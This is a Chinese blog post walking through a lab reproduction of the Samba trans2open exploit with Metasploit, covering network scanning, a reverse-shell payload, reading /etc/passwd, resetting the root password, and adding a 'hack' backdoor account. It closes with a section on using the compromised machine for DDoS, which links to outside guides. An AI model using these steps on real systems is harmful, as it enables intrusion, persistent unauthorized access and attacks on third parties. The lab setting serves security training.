基于Metasploit完成Samba服务漏洞复现

最新推荐文章于 2024-05-11 22:55:30 发布
最新推荐文章于 2024-05-11 22:55:30 发布
阅读量7.7k 收藏 11
点赞数 2
分类专栏: 渗透测试 文章标签: 虚拟机 windows 安全 linux 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43332640/article/details/123398951
版权

实验环境:

靶机ip:192.168.31.182(下载链接: https://pan.baidu.com/s/1ia-DD8UPDhIkWUd2eJWoKg?pwd=cykq 提取码: cykq 复制这段内容后打开百度网盘手机App,操作更方便哦)

攻击机ip:192.168.31.166(X64)

一:主机发现

arp-scan -l      #扫描同一网段下的主机

可以看到靶机的IP地址和mac地址,Vmware为虚拟机 

2.漏洞扫描

nmap  192.168.31.182  -p- -sV -sS -T4 -A         #扫描开放的端口和服务

 可以看到存在samba服务漏洞

 靶机的操作系统为linux 2.4.X,属于较低版本

 确定Samba服务的版本号

msfconsole  
search smb_version
use auxiliary/scanner/smb/smb_version 
show options
set rhosts 192.168.31.182
run

 3.漏洞利用

search samba 2.2
exploit/linux/samba/trans2open       #   或者use2
show options 
set rhosts 192.168.31.182
set payload linux/x86/shell_reverse_tcp
set lport 5555       #更换端口号,如果默认4444端口号会报错出先下图错误,建议更换端口号为5555即可成功执行
run

 注意:如果出下面这种情况,更换本地监听主机的端口号

[-] Handler failed to bind to 192.168.31.166:4444:-  -
[-] Handler failed to bind to 0.0.0.0:4444:-  -
[-] 192.168.31.182:139 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).

 4.攻击成功

id
cat /etc/passwd

出现下面的截图说明靶机攻击成功,接下来就是植入后门账号

可以看到 拿到的是root权限,但是这个shell中的有些命令受限制,我们在把集中增加一个新的后门账户,进行长久控制靶机,使之成为肉鸡

passwd root     #修改root账号的密码,进行ssh登录
123456
123456          #重复输入两次密码

 

5.远程连接靶机

1.问题复现

使用具有最高权限的root账号进行ssh远程连接靶机,正常情况输入两次密码即可正常连接,但是报错

ssh root@192.168.31.182                                                  255 ⨯

ssh root@192.168.31.182                                                  255 ⨯
Unable to negotiate with 192.168.31.182 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1

无法与192.168.31.182协商端口22:没有找到匹配的密钥交换方法。 他们的提议:diffie-hellman-group-exchange-sha1 diffie-hellman-group1-sha1  

2.报错截图

3.问题解决

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc root@192.168.31.182

root为登录的用户名,192,。168.31.182为靶机ip地址

成功登录靶机

 6.在靶机中增加账号

useradd hack
passwd 
123456
123456

 

cat /etc/passwd

 可以看到新的后门账号添加成功,接下来用后门账号远程ssh连接靶机

 ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-dss -oCiphers=+3des-cbc hack@192.168.31.182       #用hack账号登录靶机

 7.利用肉鸡执行ddos攻击

附大佬博客

如何在Kali Linux上发动DDOS攻击 - 云+社区 - 腾讯云 (tencent.com)icon-default.png?t=M276https://cloud.tencent.com/developer/article/1199800

(63条消息) 利用kali进行DOS/DDOS攻击(局域网内)(DHCP原理 ARP原理)_Firebasky的博客-CSDN博客_kali攻击路由器瘫痪icon-default.png?t=M276https://blog.csdn.net/qq_46091464/article/details/105857350


 

林小陌啊
关注
  • 2
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use
weixin_41023533的博客
11-15 1万+
Metasploit渗透测试中出的错误 Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444). 在终端输入 “netstat -tulpen”,查看进程端口信息。 命令”fuser -k 端口号/tcp“,删除4444端口进程 ...
[-] Handler failed to bind to x.x.x.x:port排错
1stPeak's Blog
02-18 1万+
报错: 原因: Kali的IP已经更换了,重新获取IP:ifconfig 如若还不行,重启msfconsole,再ifconfig,重新设置参数
[我的作死案例]图书馆泡妹记 上
wjy397的专栏
06-28 3231
https://bbs.ichunqiu.com/thread-24168-1-1.html 吾本布衣i春秋-呆萌菜鸟 发表于前天14:28253388 本帖最后由 0nise 于 2017-6-26 10:14 编辑 缘起缘落:简单来说,图书馆看见一个妹子长得还不错,然后...
SambaMS-RPC Shell命令注入漏洞(CVE-2007-2447)
最新发布
m0_62670778的博客
05-11 426
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。
使用msfconsole常见问题解决
Amdy_amdy的博客
08-23 1万+
问题总结: (其中有我遇到的问题,有我没有遇到的,但我这里总结了一下别人遇到的,未雨绸缪)问题一(这个我也遇到过,不过我安装了上面的win 32就没问题了):原因:这个因为没有/root/.wine目录,执行以下命令即可创建该目录 wine cmd.exe 问题二(我没有遇到):原因:wine在使用过程中会出现图形化界面,这就需要这个基于Mozilla的Gecko渲染引擎来呈现,手动安装所需版本的wine-gecko即可。我们首先下载Wine提供的MSI二进制文件,请注意下载32位版本的,因为我
Metasploit使用
dzqxwzoe的博客
08-14 405
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在分秒必争的CTF竞赛中,想要高效地使用自制的脚本工具来实现各种目的,更是需要拥有编程能力。Pivot模块其实就是跳板机,这里我是macos的环境,虚拟环境配置起来会非常的麻烦,简单地说就是域内有一个台主机有两张网卡,分别连不同的网段,我们kali现在只能打到一个网段,但是现在发现还有一个其他的网段,这时候就起作用了。
Linux Samba远程代码执行漏洞(CVE-2017-7494)漏洞复现
旺仔Sec&blog
05-29 2172
1.该漏洞CVE-2017-7494又被称为Linux版的永恒之蓝 2.主要是利用smb上的反弹shell漏洞,进行远程代码执行 3.samba3.5.0 到4.6.4/4.5.10/4.4.14的中间版本、docker
基于metasploit加载漏洞定时攻击
12-29
基于metasploit加载漏洞定时攻击
metasploit中使用lnk漏洞渗透测试.doc
03-18
Metasploit 中使用 LNK 漏洞进行渗透测试 Metasploit 是一个开源的渗透测试框架,广泛应用于网络安全测试和漏洞利用。LNK 漏洞是一种常见的 Windows 漏洞,通过exploit 可以获得目标机的shell 权限。本文将详细介绍...
metasploit实验报告及漏洞利用代码
01-11
Metasploit是一款强大的安全渗透测试工具,主要用于模拟攻击和检测系统漏洞。它是开源社区的瑰宝,由 Rapid7 维护,并且在全球范围内被安全研究人员、渗透测试人员以及网络安全专业人员广泛使用。本实验报告将深入...
最新IE 0day漏洞Metasploit生成方法.txt
03-18
最新IE 0day漏洞Metasploit生成方法.txt
基于MetaSploit的网络攻击研究(37页16263字数).doc
06-22
在分析各类攻击分类的基础上, 对MetaSploit攻击平台进行研究,实现如何利用漏洞,如何进行攻击、如何编写攻击代码payload,如何编写shellcode等。 详细介绍参考:...
内网渗透—红日安全vulnstack(二)
qq_45927819的博客
04-03 7204
红队实战系列,主要以真实企业环境为实例搭建一系列靶场,通过练习、视频教程、博客三位一体学习。本次红队环境主要Access Token利用、WMI利用、域漏洞利用SMB relay,EWS relay,PTT(PTC),MS14-068,GPP,SPN利用、黄金票据/白银票据/Sid History/MOF等攻防技术。关于靶场统一登录密码:1qaz@WSX 环境说明 内网网段:10.10.10.1/24 DMZ网段:192.168.111.1/24 测试机地址:192.168.111.1(Windows),.
20154312《网络对抗》Exp2 后门原理与实践
weixin_30781775的博客
03-24 219
常见问题快速链接 Handler failed to bind to xxx.xxx.xx.xxx:xxxx 使用Webcam_snap命令提示1411错误,无法正常拍照 常用后门工具实践 Windows获得Linux Shell Windows:使用ipconfig指令查看本机IP: 使用ncat.exe程序监听本机的4312端口: Kali:使用nc指令的-e选项反向连...
利用MS17-010渗透win7(32位)
1stPeak's Blog
06-07 2万+
MS17-010就是我们常说的永恒之蓝漏洞 1.首先我们测试目标系统是否存在该漏洞 2.永恒之蓝漏洞利用前的准备与之后的实施 3.问题总结 4.如果使用该模块攻击win7x64注意事项 这篇文章主要写的是对win7(x86)系统的渗透,x64的请点击这里利用MS17-010渗透win7(64位),我们这里的环境是攻击者(IP:192.168.1.222),靶机(IP:192.168.1.221)...
BindTransportException: Failed to bind to [9300]
程裕强的专栏
02-12 5825
1、异常信息 [2019-02-12T15:50:30,496][INFO ][o.e.n.Node ] [elastic1] starting ... [2019-02-12T15:50:30,775][WARN ][o.e.b.ElasticsearchUncaughtExceptionHandler] [elastic1] uncaught exception i...
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4358
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
2.8 利用samba漏洞进行渗透
qq_55202378的博客
07-17 2375
samba漏洞
ElasticSearch启动过程错误:org.elasticsearch.transport.BindTransportException: Failed to bind to [9300-9400
热门推荐
chenxb1986的博客
11-19 4万+
[2018-11-20T06:38:34,516][ERROR][o.e.b.Bootstrap ] [es-node] Exception org.elasticsearch.transport.BindTransportException: Failed to bind to [9300-9400] at org.elasticsearch.transport.TcpTra...
msf上传文件到服务器,Metasploit 文件包含漏洞
05-25
以下是使用 Metasploit 框架利用文件包含漏洞上传文件到目标服务器的步骤: 1. 打开 Metasploit 控制台并输入“use exploit/multi/http/php_file_upload”命令。 2. 设置目标服务器的相关参数,包括目标 IP 地址、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

林小陌啊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值